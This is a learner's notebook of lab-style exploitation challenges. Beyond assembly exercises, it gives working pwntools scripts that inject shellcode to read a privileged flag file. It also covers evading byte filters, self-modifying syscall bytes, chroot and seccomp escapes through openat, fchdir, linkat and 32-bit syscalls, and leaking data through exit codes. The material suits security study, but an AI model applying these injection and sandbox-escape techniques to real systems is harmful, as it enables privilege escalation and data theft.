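The off-by-the-jmp-itself mistake is easy to see with the short jump encoding, `EB rel8`, where the displacement is added to the address of the next instruction. A small sketch with a made-up load address (the helper names are invented for this example):

```python
def encode_jmp_short(skip: int) -> bytes:
    """Encode `jmp short` over `skip` bytes (forward only in this sketch)."""
    if not 0 <= skip <= 0x7F:
        raise ValueError("rel8 forward range is 0..0x7f")
    return bytes([0xEB, skip])


def jump_target(jmp_addr: int, encoded: bytes) -> int:
    """Target = address of the instruction after the jmp + signed rel8."""
    rel8 = encoded[1] - 256 if encoded[1] >= 0x80 else encoded[1]
    return jmp_addr + len(encoded) + rel8


if __name__ == "__main__":
    jmp = encode_jmp_short(0x51)
    # Hypothetical address: the jmp itself sits at 0x400000.
    print(jmp.hex(), hex(jump_target(0x400000, jmp)))
```

With the 2-byte jmp at 0x400000, skipping 0x51 bytes lands on 0x400053, not 0x400051.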

shellcode="""
jmp L1
.rept 0x51
nop
.endr
L1:
pop rdi
mov rcx, 0x403000
jmp rcx
"""

18. An if-elif-else chain. Note the statement says [rdi] is a double word and may be negative, so my first attempt with QWORD PTR was wrong; it has to be DWORD PTR

shellcode="""
mov eax, [rdi+4]
mov r8d, [rdi+8]
mov r9d, [rdi+12]
cmp DWORD ptr [rdi], 0x7f454c46 #!!!!!!
jne leif
add eax, r8d
add eax, r9d
jmp done

leif:
cmp DWORD PTR[rdi], 0x00005A4D #!!!!!!                                                 
jne else
sub eax, r8d
sub eax, r9d
jmp done

else:
    mul r8d
    mul r9d

done:
"""

19. Conditional jumps can only be direct jumps

shellcode="""
    cmp rdi, 4
    jl AAA
    mov rdi, 4
AAA:
    mov rax, rdi
    mov rbx, 8
    mul rbx
    mov ebx, DWORD PTR [rax+rsi]
    jmp rbx
"""

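20. After a long struggle I found a mistake in the problem statement: the elements here are clearly DWORDs, but it calls them quad words.

One more thing I had overlooked: with add eax, ebx, anything beyond four bytes is discarded

My approach is to load each double word through eax and do the addition in rax.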
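
The truncation is easy to reproduce by masking Python integers to the register width. A minimal sketch (function names are made up) comparing a 32-bit accumulator with a 64-bit one over the same unsigned dwords:

```python
MASK32 = 0xFFFFFFFF
MASK64 = 0xFFFFFFFFFFFFFFFF


def sum_in_eax(values):
    """Accumulate like `add eax, ebx`: the carry out of bit 31 is lost."""
    total = 0
    for value in values:
        total = (total + value) & MASK32
    return total


def sum_in_rax(values):
    """Load each dword zero-extended, then accumulate in a 64-bit register."""
    total = 0
    for value in values:
        total = (total + (value & MASK32)) & MASK64
    return total


if __name__ == "__main__":
    dwords = [0xFFFFFFFF, 2]
    print(hex(sum_in_eax(dwords)), hex(sum_in_rax(dwords)))
```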

shellcode="""
jmp test
loop:
    mov eax, [rdi+rbx*4]    # here
    add rcx, rax
    inc rbx
test:
    cmp rbx, rsi
    jne loop

mov rax, rcx
div rsi
"""

21. I just could not get this any simpler

shellcode="""
test rdi, rdi
jz done
jmp test
loop:
    inc rdi
    inc rax
test:
    mov cl, [rdi]
    test rcx, rcx
    jne loop

done:
"""

22. Calls

Another long struggle, mainly because the comparison is byte by byte, which the problem statement does not make obvious: a bare [src_addr] really does mean a single BYTE

shellcode="""
xor rax, rax
mov r12, 0x403000
mov rdx, rdi    /* keep rdi in a temporary */

test rdx, rdx
jz done

test:
mov rsi, [rdx]
test sil, sil    /* fetched from memory, then only the low byte is checked */
jz done

loop:
cmp sil, 90
jg if
mov r13, rax    /* save the counter before calling foo at 0x403000 */
mov dil, [rdx]
call r12
mov [rdx], al
mov rax, r13
inc rax

if:
inc rdx
jmp test

done:
ret
"""

23. I got lazy and used someone else's code; off to review operating systems

;source code:
most_common_byte(src_addr, size):
    b = 0
    i = 0
    for i <= size-1:
        curr_byte = [src_addr + i]
        [stack_base - curr_byte] += 1
    b = 0

    max_freq = 0
    max_freq_byte = 0
    for b <= 0xff:
        if [stack_base - b] > max_freq:
            max_freq = [stack_base - b]
            max_freq_byte = b

    return max_freq_byte
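
As a cross-check for the assembly, the pseudocode above translates almost line for line into Python. A reference sketch: a 256-entry list stands in for the stack frame, and ties go to the smallest byte value because the comparison is strict.

```python
def most_common_byte(data: bytes) -> int:
    """Return the byte value that occurs most often in `data`."""
    counts = [0] * 256          # plays the role of the 0x100-byte stack area
    for byte in data:
        counts[byte] += 1

    max_freq = 0
    max_freq_byte = 0
    for value in range(0x100):
        if counts[value] > max_freq:
            max_freq = counts[value]
            max_freq_byte = value
    return max_freq_byte


if __name__ == "__main__":
    print(chr(most_common_byte(b"abbbcc")))
```

Unlike the one-byte counters in the assembly version, Python integers cannot overflow, so inputs with more than 255 repeats of one byte may give different answers there.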

shellcode="""
    push rbp
    mov rbp, rsp
    sub rsp, 0x100
    mov rbx, -1
AAA:
    add rbx, 1
    cmp rbx, rsi
    je BBB
    mov cl, byte ptr [rdi+rbx]
    add BYTE ptr [rsp+rcx], 1
    jmp AAA

BBB:
    mov rbx, -1
    xor rcx, rcx
    xor rdx, rdx
CCC:
    add rbx, 1
    cmp rbx, 0x100
    je DDD
    cmp BYTE ptr [rsp+rbx], CL
    jle CCC
    mov CL, BYTE ptr [rsp+rbx]
    mov rdx, rbx
    JMP CCC

DDD:
    mov rax, rdx
    mov rsp, rbp
    pop rbp
    ret
"""

module 4-sc

Almost everything is in the slides.

0. Basics

intro:
- Building shellcode: just use pwntools.
- Debugging: strace or gdb
common challenges:
- forbidden bytes: such as NULL ('\0'), whitespace, 'H' and so on.
- self-modifying code in level 5.
  gcc -Wl,-N --static -nostdlib -o test test.s to make the .text segment writable
- multistage shellcoding:
  read into later bytes; or read straight over the running code with read(0, rip, 1000) (use lea rax, [rip] to get rip)
- Shellcode mangling:
  work backwards or jump over some parts to avoid them.
- Unable to speak:
  if you can communicate one bit, then you can communicate.
  such as an exit code? maybe inefficient. or a signal? or ...
Remaining injection points: JIT (just-in-time) compilation.

avoid null-bytes:

mov rdi, 0 -> xor rdi, rdi
xor edi, edi //will clear rdi
mov rax, 2 -> mov al , 2
mov rsi, 100 -> xor rsi, rsi / mov si, 100
;set a byte(0x01) in the asm, then dec that address
lea rdi, [rip+0x3d] -> mov byte ptr [rip+1], '/' ;and then, the whole string: '/flag'

mov rsi, 0x1017eff3d8d4981 -->
movabs rsi, 0x101010101010101
push rsi
movabs rsi, 0x1017eff3d8d4981
xor qword ptr [rsp], rsi
pop rsi
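
The push/xor/pop sequence works because both constants are free of zero bytes while their XOR is the value actually wanted. Here is a sketch of how such a pair can be derived; this is my own reconstruction for illustration, not pwntools' implementation, and `split_without_nulls` is an invented name.

```python
def split_without_nulls(value: int):
    """Return (key, encoded) with key ^ encoded == value and no 0x00 byte in either."""
    key = 0
    encoded = 0
    for shift in range(0, 64, 8):
        byte = (value >> shift) & 0xFF
        # 0x01 works unless the byte itself is 0x01 (that would encode to 0x00).
        k = 0x02 if byte == 0x01 else 0x01
        key |= k << shift
        encoded |= (byte ^ k) << shift
    return key, encoded


if __name__ == "__main__":
    key, encoded = split_without_nulls(0x7FFE3C8C4880)
    print(hex(key), hex(encoded))
```

For 0x7ffe3c8c4880 this yields exactly the two constants in the listing above, 0x101010101010101 and 0x1017eff3d8d4981.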

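1. Getting started

A very direct challenge, but it made me take a fresh look at shellcode: it turns out shellcraft.amd64.open also takes care of keeping '\0' out of the instruction sequence, something I had never thought about while using it. The first two challenges read stdin with read until EOF, though, so null bytes are not a concern there. ~~I could not even find amd64.open in the docs.~~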

import sys
from pwn import * 
from glob import *
context.log_level = 'info'
binary = glob("/challenge/b*")[1] # use a wildcard directly; it matches both the .c file and the binary, so pick the second one
context.binary = binary
p = process(binary) 

p.recvuntil("stack at 0x")
addr = int(p.recvline()[:-2], 16)

# open the file (fd returned in rax), read it into memory at addr+0x100, then write it to stdout
shellcode = shellcraft.amd64.open("/flag")
shellcode+= shellcraft.amd64.read('rax', addr+0x100, 0x100)
shellcode+= shellcraft.amd64.write(1, addr+0x100, 0x100)

payload = asm(shellcode)
p.recv()
p.sendline(payload)
p.interactive()

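The test program reads bytes straight from stdin into an array, then casts the array pointer to a function pointer and calls it, which runs the shellcode.

Here is the generated asm, to see how it works.

movabs rax, 0x101010101010101
push rax
movabs rax, 0x1010166606d672e # XOR-encoded '/flag' string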
xor qword ptr [rsp], rax
mov rdi, rsp
xor edx, edx
xor esi, esi
push 2
pop rax
syscall    # open

mov rdi, rax
xor eax, eax
xor edx, edx
mov dh, 1
movabs rsi, 0x101010101010101
push rsi
movabs rsi, 0x1017eff3d8d4981
xor qword ptr [rsp], rsi
pop rsi
syscall # read

push 1
pop rdi
xor edx, edx
mov dh, 1
movabs rsi, 0x101010101010101
push rsi
movabs rsi, 0x1017eff3d8d4981
xor qword ptr [rsp], rsi
pop rsi
push 1
pop rax
syscall     # write to stdout

2.emmmm

This challenge will randomly skip up to 0x800 bytes in your shellcode. You better adapt to that! One way to evade this is to have your shellcode start with a long set of single-byte instructions that do nothing, such as nop, before the actual functionality of your code begins. When control flow hits any of these instructions, they will all harmlessly execute and then your real shellcode will run. This concept is called a nop sled.

`In [3]: asm('nop')`
`Out[3]: b'\x90'`

Use right-justification with fillchar b'\x90', i.e. payload = asm(shellcode).rjust(0x800, b'\x90')

import sys
from pwn import * 
from glob import *
context.log_level = 'info'
binary = glob("/challenge/babyshell_level[0-9]")[0]
context.binary = binary
p = process(binary)

p.recvuntil("stack at 0x")
addr = int(p.recvline()[:-2], 16)

shellcode = shellcraft.amd64.open("/flag")
shellcode+= shellcraft.amd64.read('rax', addr+0x100, 0x100)
shellcode+= shellcraft.amd64.write(1, addr+0x100, 0x100)

payload = asm(shellcode).rjust(0x300, b'\x90')
p.recv()
p.sendline(payload)
p.interactive()

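4. Building a trampoline

Trying the encode function: No encoders for amd64 which can avoid b'H'

One encoding of mov begins with the byte H (0x48, the REX.W prefix), so that route is closed.

The only option is to read first and then jump.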
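
Before sending a payload it helps to list exactly where the forbidden bytes sit. A small sketch with an invented helper name; the two sample encodings are `xor rdi, rdi` (48 31 ff, which carries the REX.W prefix) and `xor edi, edi` (31 ff, which does not).

```python
def find_forbidden(payload: bytes, forbidden: bytes):
    """Return (offset, byte) pairs for every forbidden byte in the payload."""
    return [(i, b) for i, b in enumerate(payload) if b in forbidden]


if __name__ == "__main__":
    print(find_forbidden(bytes.fromhex("4831ff"), b"H"))  # xor rdi, rdi
    print(find_forbidden(bytes.fromhex("31ff"), b"H"))    # xor edi, edi
```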

import sys
from pwn import * 
from glob import *
context.log_level = 'info'
binary = glob("/challenge/babyshell_level[0-9]")[0]
context.binary = binary
p = process(binary)

p.recvuntil("memory at 0x")
addr = int(p.recvline()[:-2], 16)

# The test program's disassembly printout shows that read encodes to 0xf bytes, so no jmp is needed; the second stage lands right after it
shellcode = shellcraft.amd64.read(0, addr+0xf, 0x100)

payload = asm(shellcode)
p.sendline(payload)
p.recv() # not important

shellcode = shellcraft.amd64.open("/flag")
shellcode+= shellcraft.amd64.read('rax', addr+0x100, 0x100)
shellcode+= shellcraft.amd64.write(1, addr+0x100, 0x100)
payload = asm(shellcode)
p.sendline(payload)

p.interactive()

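5. syscall instructions forbidden

Well, this... After struggling for a long while I went back over the slides and finally understood what this one is testing.

You can use something like mov byte ptr [rip + s01], 0x0f to modify the shellcode itself. The trick is to keep the two bytes of 0f 05 apart.

`mov byte ptr [rip+syscall1], 0x0f`
`mov byte ptr [rip+syscall2], 0x05`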

exploit:

import sys
from pwn import * 
from glob import *
context.log_level = 'info'
binary = glob("/challenge/babyshell_level[0-9]")[0]
context.binary = binary    # the usual way to set arch
p = process(binary)

p.recvuntil("memory at 0x")
addr = int(p.recvline()[:-2], 16)
shellcode = shellcraft.amd64.open("/flag")
shellcode+= shellcraft.amd64.read('rax', addr+0x100, 0x100)
shellcode+= shellcraft.amd64.write(1, addr+0x100, 0x100)

# dec BYTE PTR [rip+1]
# b'\xfe\r\x01\x00\x00\x00'
payload = asm(shellcode)

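i = 0
# len = len(payload)
while i < len(payload) - 1:
    if payload[i]==0x0f and payload[i+1]==0x05:
        # On finding syscall (0f 05), replace it with a dec instruction followed by 0f 06;
        # at run time the dec turns the 06 back into 05.
        # 0f 06 itself is CLTS (Clear Task-Switched Flag in CR0).
        # A non-existent opcode such as 0f 04 would also do (with inc instead of dec);
        # it does not make the challenge's disassembler die with SIGSEGV.
        payload = payload[:i] + b'\xfe\r\x01\x00\x00\x00' + b'\x0f\x06' + payload[i+2:]
        i+=8
    else:
        i+=1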

p.sendline(payload)
p.interactive()
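
The patching loop above can be tried without pwntools. This is only a sketch: the function name hide_syscalls and the 4-byte sample are made up for illustration, and a plain byte scan like this would also rewrite a 0f 05 that happens to sit inside an immediate.

```python
# dec byte ptr [rip+1]: decrements the second byte of whatever follows it
DEC_NEXT = b"\xfe\x0d\x01\x00\x00\x00"


def hide_syscalls(code: bytes) -> bytes:
    """Replace every 0f 05 with the dec stub followed by 0f 06."""
    out = bytearray()
    i = 0
    while i < len(code):
        if code[i:i + 2] == b"\x0f\x05":
            out += DEC_NEXT + b"\x0f\x06"  # becomes 0f 05 again at run time
            i += 2
        else:
            out.append(code[i])
            i += 1
    return bytes(out)


# Hypothetical input: mov al, 0x3c ; syscall
sample = b"\xb0\x3c\x0f\x05"
patched = hide_syscalls(sample)
print(patched.hex())
```

Each syscall grows from 2 to 8 bytes, which is why the original loop advances i by 8 after a replacement.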

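6. Same as above, but the first 0x1000 bytes lose write permission; 0x2000 bytes can be written in total

It is enough for the buffer that read writes to lie in the second 4096 bytes, followed by payload = payload.rjust(0x1500, b'\x90').

I tripped over rjust of all things: at first I assumed rjust modified the bytes object in place, but bytes is immutable; then I found that width is the total length after padding, not the number of fill bytes added on the left.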
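
Both rjust surprises are easy to see in isolation. A minimal sketch; the three 0xcc bytes merely stand in for asm(shellcode):

```python
sled_byte = b"\x90"
code = b"\xcc\xcc\xcc"              # stand-in for asm(shellcode)

padded = code.rjust(8, sled_byte)   # width is the TOTAL length, not the pad count
short = code.rjust(2, sled_byte)    # width below len(code): returned unchanged

print(padded)   # five nops, then the three code bytes
print(code)     # still three bytes: rjust returns a new object
```

So a sled of n nops in front of the code needs rjust(len(code) + n, b'\x90'), and the result has to be assigned back.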

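7. stdio is closed

According to the slides, even returning a single bit per run is enough to communicate.

Simply opening another file for the output works, though. I tripped over the flags argument of the open syscall: it has to be O_WRONLY or O_RDWR.

shellcraft's open accepts the flags either as an int or as a string. The string form only works in upper case (naturally, since the assembler only knows those constant definitions).

# Open /flag (fd in rax), read it into memory at addr+0x200, then write it to /home/hacker/res (flags=1, i.e. O_WRONLY)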
shellcode = shellcraft.amd64.open("/flag")
shellcode+= shellcraft.amd64.read('rax', addr+0x200, 0x100)
shellcode+= shellcraft.amd64.open("/home/hacker/res", 1)
shellcode+= shellcraft.amd64.write('rax', addr+0x200, 0x40)

payload = asm(shellcode)

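8. Write permission is restricted

Only 0x12 (18) bytes of assembled code can be sent the first time. After that the challenge calls mprotect(shellcode_mem, 4096, PROT_READ|PROT_EXEC), which rules out writing to the page again.

Hmm...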

tips:

In fact these are a lot of bytes. Try different sys calls. There are other ways to read a flag as well

Search for a syscall that takes minimal argument so as to decrease size

syscalls man7

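After a long search, chmod turned out to be the only usable call, and it comes to exactly 18 bytes. At first I thought about reading the file, but that cannot work: the data could only go into the buffer and there is no room left for more logic. 18 bytes is simply too few, so the approach has to change: alter the file's permissions, after which it can be read freely.

To save as much space as possible, '/flag' is placed at the very end of the bytes; the position of the '/' is computed from the start address addr and replaces the placeholder 9 in s1.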

addr = int(p.recvline()[:-2], 16)

s1 = '''
    /* chmod(file='/flag', mode='S_IROTH') */
    mov edi, 9
    mov sil, 0x04 /* S_IROTH == 0x04 */
    /* call chmod() */
    mov al, 0x5a
    syscall
'''
pos = s1.find('9')
s1 = s1[:pos] + hex(addr+12) + s1[pos+1:]
temp = asm(s1)
payload = temp + b'/flag'

The substitution is not mandatory: lea rdi, [rip+0x??] works too, as does the chown system call below.

lea rdi, [rip+0xf]
mov si, 0x3e8
mov dx, si
mov al, 92
syscall # chown(const char *pathname, uid_t owner, gid_t group)

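13. Same as above, but only 0xc bytes. It looks like only chown or chmod can fit; chmod is used here.

The file name should be pushed onto the stack and rdi loaded from rsp; that cuts the length considerably. The one-byte name 'f' is a relative path, so it has to be a symlink to /flag in the working directory.

Because of little-endian storage, the 0x66 is naturally followed by 7 null bytes.
gdb shows that rax holds the return value of puts, which is simply 0 here. This is an important point: exploit predictable register values.

push 0x66           ;6a 66   ('f')
mov rdi, rsp        ;48 89 e7
mov sil, 0x04       ;40 b6 04
mov al, 0x5a        ;b0 5a
syscall             ;0f 05   total length 0xc

A second option is execve of a shell script. The script must start with #!/bin/sh -p, where -p stops the shell from resetting the SUID privileges as it does by default. The script body is just cat /flag.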

9. The shellcode gets modified

This challenge modified your shellcode by overwriting every other 10 bytes with 0xcc. 0xcc, when interpreted as an
instruction is an INT 3, which is an interrupt to call into the debugger. You must avoid these modifications in your
shellcode.

s1 = '''
    /* chmod(file='/flag', mode='S_IROTH') */
    lea edi, [rip+0x22]
    jmp done
    .space 12
done:
    mov sil, 0x04 /* S_IROTH == 0x04 */
    /* call chmod() */
    mov al, 0x5a
    syscall
    .skip 13
'''
payload = asm(s1) + b'/flag\x00'
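
The layout of s1 can be sanity-checked offline. This sketch assumes the challenge clobbers offsets 10-19, 30-39 and so on (one reading of "every other 10 bytes"); clobber and the A/B filler bytes are illustrative stand-ins for the real instructions.

```python
def clobber(payload: bytes, block: int = 10) -> bytes:
    """Overwrite every second block of `block` bytes with 0xcc (assumed pattern)."""
    out = bytearray(payload)
    for i in range(len(out)):
        if (i // block) % 2 == 1:
            out[i] = 0xCC
    return bytes(out)


# Same shape as s1: 8 bytes of code (lea + jmp), 12 filler, 7 bytes of code
# (mov sil / mov al / syscall), 13 filler, then the path string.
layout = b"A" * 8 + b"\x00" * 12 + b"B" * 7 + b"\x00" * 13 + b"/flag\x00"
after = clobber(layout)
print(after)
```

Under that assumption both code fragments and the string at offset 40 survive, which matches the rip+0x22 displacement: the lea ends at offset 6, and 6 + 0x22 = 40.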

10.sort ur shellcode

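Every 8 bytes are treated as one 64-bit unsigned integer, and these are bubble-sorted into ascending order. Hmm...

The code below happens to come out right under that 8-byte ascending sort. The main idea is to keep the shellcode as short as possible and move opening, reading and writing the file into a separate program (a small file reader written in C); the program started through execve keeps the privileges of the calling process.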

shellcode = '''
    push 0x632f2e
    mov rdi, rsp
    xor edx, edx /* 0 */
    xor esi, esi /* 0 */
    /* call execve() */
    push SYS_execve /* 0x3b */
    pop rax
    syscall
'''
#   0:   68 2e 2f 63 00          push   0x632f2e
#   5:   48 89 e7                mov    rdi, rsp
#   8:   31 d2                   xor    edx, edx
#   a:   31 f6                   xor    esi, esi
#   c:   6a 3b                   push   0x3b
#   e:   58                      pop    rax
#   f:   0f 05                   syscall

11. Same as above, with stdin closed

The previous solution keeps working.

12. Every byte has to be unique

ascii_values = [ord(character) for character in text]   (Python string => ASCII codes)

shellcode = '''
    push 0x632f2e
    mov rdi, rsp
    xor esi, esi /* 0 */
    lea edx, [esi] /* 0 */
    /* call execve() */
    push SYS_execve /* 0x3b */
    pop rax
    syscall
'''

Unexpectedly simple: it is enough to replace the second xor with a lea that clears edx. My first attempt with mov did not work.
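
A quick duplicate check makes the difference between the level 10 and level 12 versions visible. The byte strings below were assembled by hand from the listings, so treat them as assumptions; the mov variant is only one plausible candidate for the failed attempt (mov edx, esi encodes as 89 f2 and collides with the 0x89 of mov rdi, rsp).

```python
from collections import Counter


def repeated_bytes(code):
    """Return the sorted byte values that occur more than once."""
    return sorted(b for b, n in Counter(code).items() if n > 1)


# push 0x632f2e; mov rdi, rsp; xor edx, edx; xor esi, esi; push 0x3b; pop rax; syscall
level10 = bytes.fromhex("682e2f6300" "4889e7" "31d2" "31f6" "6a3b" "58" "0f05")
# same, with xor esi, esi first and lea edx, [esi] instead of the second xor
level12 = bytes.fromhex("682e2f6300" "4889e7" "31f6" "678d16" "6a3b" "58" "0f05")
# hypothetical mov attempt: mov edx, esi instead of the lea
with_mov = bytes.fromhex("682e2f6300" "4889e7" "31f6" "89f2" "6a3b" "58" "0f05")

for name, code in (("level10", level10), ("level12", level12), ("mov", with_mov)):
    print(name, [hex(b) for b in repeated_bytes(code)])
```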

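14. Only 6 bytes are read

It looks like a 2-stage shellcode is the only option.

This again relies on rax being 0 (the read syscall number) and on rdx holding the address of the shellcode memory, which can double as the number of bytes to read. For read, only rsi (the second argument) has to be set to the address in rdx, and a simple mov does that. The second stage can then be anything.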

shellcode = '''
xor edi, edi
mov esi, edx
syscall	//call read(0, 0x14e40000, 0x14e40000)
//2-stage shellcode
.space 6, 0x90
'''
shellcode += shellcraft.amd64.open('/flag')
shellcode += shellcraft.amd64.read('rax', 0x14e40000+0x100, 0x40)
shellcode += shellcraft.amd64.write(1,    0x14e40000+0x100, 0x40)

payload = asm(shellcode)
with open("/home/hacker/input", "wb") as o:
    o.write(payload)

module 5-jail

chroot(“/tmp/jail”)
- chroot(“/tmp/jail”) does NOT:
  
  Close resources that reside outside of the jail.
  cd (chdir()) into the jail.
  Do anything else!
- you can use openat and execveat: int openat(**int dirfd**, char *pathname, int flags);
  
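  If the path given to these two functions is absolute, dirfd is ignored;
  if the path is relative and dirfd is valid, the path is resolved relative to the directory that dirfd refers to.
- What happens on a second chroot? The kernel keeps no record of the first one.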
- Generally, a user with an effective ID of 0 (i.e., a process run as root or SUIDed to root) can always break out of a chroot, unless the chroot syscall is blocked!
- Also missing other forms of isolation: PID, network, IPC
- Replacements: cgroups, namespaces, seccomp
seccomp:
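- gcc -o test test.c -lseccomp, then seccomp-tools dump ./test
- Under the hood it is BPF: seccomp filters are classic BPF programs run by the kernel, and the extended variant (eBPF) is also used to build a whole range of system tracing tools
break out seccomp: Generally, to do anything useful, a sandboxed process needs to be able to communicate with the privileged process. There are two openings: first, there are many syscalls and some of the allowed ones may be abusable; second, developers may get the permissions wrong in order not to break functionality.
- permissive policies: ptrace() sendmsg() prctl() process_vm_writev()
- syscall confusion: on some systems, you can switch between 32-bit mode and 64-bit mode in the same process, and the syscall numbers are different between architectures. For example, the system call instructions are int 0x80 and syscall respectively (\xcd\x80 and \x0f\x05), and the syscall numbers differ too.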
- kernel vulnerabilities in the syscall handlers: Over 30 chrome sandbox escapes in 2019 link
- data exfiltration: such as sleep(), exit(), normal or crash. Or use DNS queries to bypass network egress filters.

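Redirections matter a lot. link

Addendum:

In practice, running the chroot command directly in a shell does not allow the escape; it only works when the chroot library function is called from C code. My guess is that the chroot command wraps the system call and also changes into a directory inside the jail, whereas the libc function is the bare system call with no chdir step.
Quite a few functions have an *at version: chmod -> fchmodat, open -> openat (open is just a libc wrapper around openat), and so forth.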
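
The dirfd rules can be tried from Python, whose os.open takes a dir_fd argument and then behaves like openat. A small sketch on Linux; the temporary directory and the fake flag content are made up:

```python
import os
import tempfile

with tempfile.TemporaryDirectory() as outside:
    with open(os.path.join(outside, "flag"), "w") as f:
        f.write("demo{not-a-real-flag}")

    # A descriptor for a directory, like the 6<. trick on the command line
    dirfd = os.open(outside, os.O_RDONLY | os.O_DIRECTORY)
    try:
        # Relative path: resolved against dirfd
        fd = os.open("flag", os.O_RDONLY, dir_fd=dirfd)
        relative_read = os.read(fd, 64)
        os.close(fd)

        # Absolute path: dirfd is ignored
        fd = os.open(os.path.join(outside, "flag"), os.O_RDONLY, dir_fd=dirfd)
        absolute_read = os.read(fd, 64)
        os.close(fd)
    finally:
        os.close(dirfd)

print(relative_read, absolute_read)
```

A directory descriptor opened before the chroot keeps pointing outside the jail, which is what the later levels rely on.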

1.exemplify

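Quite simple: the program does not change into the jail after chroot. Make the cwd the real root directory and pass flag as the first argument; since flag is a relative path, the final open resolves it against the real root and reaches the true flag.

2. Same as level 1

The first argument must not contain the string flag, which prevents opening the flag file directly. This challenge also accepts injected shellcode.

Nothing hard here either: open 'flag' inside the shellcode and write it to stdout.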

import sys
from pwn import *
from glob import *
context.log_level = 'info'
binary = glob("/challenge/baby*[0-9]")[0]
context.binary = binary
p = process([binary, b'abc']) # the argument cannot name the flag file directly

shellcode = shellcraft.amd64.open('flag', 'O_RDWR')
shellcode+= 'lea r8, [rip]\nadd r8, 0x100\n'	# buffer just past the shellcode; this probably stops working soon
shellcode+= shellcraft.amd64.read('rax', 'r8', 0x100)
shellcode+= shellcraft.amd64.write(1, 'r8', 0x40)

payload = asm(shellcode)
payload += b'\x0f\x04'	# append an illegal instruction: hitting SIGILL confirms the shellcode ran to the end
p.sendline(payload)

p.interactive()

3.move in

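The argument must not contain the substring flag, the file is opened with O_NOFOLLOW so symlinks are useless, and there is only one open before the chdir.
The flag cannot be opened from the command line either, symlinks included. Perhaps a second chroot is the only way left to escape. That does not seem to work either; according to the video, openat is the tool.
Tried chroot on Kali. openat worked.

A directory stream file descriptor and an ordinary file descriptor are not the same thing; details still to be looked up. openat only works with a dirfd.
Typing ./chroot flag 6<. on the command line is enough: it opens the current directory with dirfd=6.
fd=3 can also be used directly: it is the first command-line argument, opened before the chroot, and usable by openat.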

import os
from pwn import *
from glob import *
context.log_level = 'info'
binary = "/challenge/"+os.uname().nodename
context.binary = binary

shellcode = shellcraft.amd64.openat(6, "flag", "O_RDWR") 
shellcode += shellcraft.amd64.sendfile(1, 'rax', 0, 100)
payload = asm(shellcode)

with open('/home/hacker/input', 'wb') as o:
    o.write(payload)

4.seccomped -> openat

The requirements grow with each level. openat still works here, unchanged.

5. linkat

shellcode = shellcraft.amd64.linkat(6, "flag", "AT_FDCWD", '/f', 0)
shellcode+= shellcraft.amd64.open("f", "O_RDWR")
shellcode+= shellcraft.amd64.sendfile(1, "rax", 0, 128)

6.fchdir


shellcode = shellcraft.amd64.fchdir(6)                       
shellcode+= shellcraft.amd64.open("flag", "O_RDWR")
shellcode+= shellcraft.amd64.sendfile(1, "rax", 0, 128)

7. No more *at syscalls

Allowed syscalls:

chdir (number 80).
chroot (number 161).
mkdir (number 83).
open (number 2).
read (number 0).
write (number 1).
sendfile (number 40).

Use a second chroot:

shellcode = shellcraft.amd64.mkdir("/temp", 0o777)
shellcode+= shellcraft.amd64.chroot("/temp")             
shellcode+= shellcraft.amd64.open("../../flag", "O_RDWR")
shellcode+= shellcraft.amd64.sendfile(1, "rax", 0, 128)

8.openat read write send

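Nothing special. The argument is no longer barred from containing flag. The level 3 solution works as is.

9. Switch to 32-bit

syscall no: 3,4,5,6: close, stat, fstat, lstat. ???????????

Right: the program adds its seccomp rules through the SCMP_SYS() macro but then sets the arch to x86_32, so what is allowed are the 32-bit read, write, open and close system calls. There is no chroot either.

Trying to use pwntools ran into all kinds of problems.

How does code switch between 64-bit and 32-bit system calls? Through int 0x80 versus syscall? Yes (learned in October 2022).
The int 0x80 code is still assembled in 64-bit mode, where push takes at most a DWORD immediate; anything larger is an operand mismatch.
The string's address has to come from a label in the assembly. Stack addresses are still 64 bits wide, which is probably too long for the 32-bit open to use.
In 64-bit assembly constants like SYS_read cannot be used for this; plain numbers are needed.

The trimmed-down version (not trimmed by much):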

/* open(file='/flag', oflag='O_RDWR', mode=0) */
/* push b'/flag\x00' */
lea ebx, [rip+flag]
mov ecx, 0x2
xor edx, edx
/* call open() */
mov eax, 5
int 0x80
/* read(fd='eax', buf=0x1337100, nbytes=0x99) */
mov ebx, eax
mov ecx, 0x1337100
mov rdx, 0x99
/* call read() */                               
push 3	/* 3 */
pop rax
int 0x80
/* write(fd=1, buf=0x1337100, n=0x99) */
mov ebx, 0x1
mov ecx, 0x1337100
mov rdx, 0x99
/* call write() */
mov eax, 4
int 0x80

flag:
    .ascii "/flag"
    .byte 0 # optional: the mapped address space is zero-filled anyway
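
The confusion behind the "???" is just two different numbering tables. A small lookup, listing only the entries relevant here:

```python
# Syscall numbers as seen through int 0x80 (i386 table)
I386 = {1: "exit", 3: "read", 4: "write", 5: "open", 6: "close"}
# Syscall numbers as seen through the syscall instruction (x86_64 table)
X86_64 = {0: "read", 1: "write", 2: "open", 3: "close",
          4: "stat", 5: "fstat", 6: "lstat", 60: "exit"}

for nr in (3, 4, 5, 6):
    print(f"{nr}: int 0x80 -> {I386[nr]:5}  syscall -> {X86_64[nr]}")
```

The filter allows numbers 3-6, which a 64-bit tool decodes as close/stat/fstat/lstat, while through int 0x80 the same numbers are read/write/open/close.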

10.side channel communication

There is no chroot at all any more. This level returns one byte per run through exit.

import os
from pwn import *
from glob import *
context.log_level = 'info'
binary = "/challenge/babyjail_level10"
context.binary = binary

ans = ""
for i in range(60):
    shellcode =  'mov r8, rdx\nmov r9, r8\nadd r8, 0x100'
    shellcode += shellcraft.amd64.read(3, 'r8', 0x100)
    shellcode += 'mov r10, [r8+'+hex(i)+']\n'
    shellcode += shellcraft.amd64.exit('r10')
    payload = asm(shellcode)
    p = process([binary, '/flag'])
    p.sendline(payload)
    exitCode = p.poll(1)
    ans += chr(exitCode)

print(ans)
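
The exit-code channel itself can be reproduced with nothing but the standard library. In this sketch a throwaway Python child plays the role of the sandboxed shellcode; SECRET and leak_byte are made-up names, not part of the challenge.

```python
import subprocess
import sys

SECRET = "demo{x}"   # hypothetical stand-in for the flag


def leak_byte(index: int) -> int:
    """Run a child that exits with the code of one secret character."""
    child = "import sys; sys.exit(ord(sys.argv[1][int(sys.argv[2])]))"
    proc = subprocess.run([sys.executable, "-c", child, SECRET, str(index)])
    return proc.returncode


recovered = "".join(chr(leak_byte(i)) for i in range(len(SECRET)))
print(recovered)
```

One process per character is slow but needs no output channel at all; only the low 8 bits of the exit status survive, which is exactly one byte.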

11.nanosleep

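This time the data really has to be collected bit by bit.

Problems and notes along the way:

A broken tube happens occasionally; cause unknown.
The string format function can be used to build the shellcode.
On the pwn.college machine both members of the timespec struct are eight bytes (long included).
A 32-bit NASM program copied from the web tripped me up; this is 64-bit GAS, so nearly everything had to be changed.
setnz came to mind after seeing it in my mind map. The old notes turned out to be decent.
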